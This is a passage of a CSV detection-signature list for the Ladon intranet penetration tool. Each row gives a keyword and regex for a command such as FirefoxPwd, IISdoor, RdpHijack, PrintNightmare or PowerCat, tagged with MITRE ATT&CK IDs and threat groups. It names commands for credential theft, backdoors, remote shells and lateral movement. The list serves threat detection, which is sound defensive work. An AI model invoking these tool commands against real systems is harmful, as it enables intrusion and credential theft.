T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FirefoxPwd*",".{0,1000}Ladon\sFirefoxPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ForExec *",".{0,1000}Ladon\sForExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FtpDownLoad *",".{0,1000}Ladon\sFtpDownLoad\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FtpServer *",".{0,1000}Ladon\sFtpServer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon GetDomainIP*",".{0,1000}Ladon\sGetDomainIP.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon gethtml *",".{0,1000}Ladon\sgethtml\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon GetPipe*",".{0,1000}Ladon\sGetPipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon GetSystem*",".{0,1000}Ladon\sGetSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon IISdoor*",".{0,1000}Ladon\sIISdoor.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon IISpwd*",".{0,1000}Ladon\sIISpwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon MssqlCmd *",".{0,1000}Ladon\sMssqlCmd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon netsh *",".{0,1000}Ladon\snetsh\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon noping *",".{0,1000}Ladon\snoping\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon Open3389*",".{0,1000}Ladon\sOpen3389.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon PowerCat *",".{0,1000}Ladon\sPowerCat\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon PrintNightmare*",".{0,1000}Ladon\sPrintNightmare.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon psexec*",".{0,1000}Ladon\spsexec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon QueryAdmin*",".{0,1000}Ladon\sQueryAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon RdpHijack*",".{0,1000}Ladon\sRdpHijack.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ReadFile 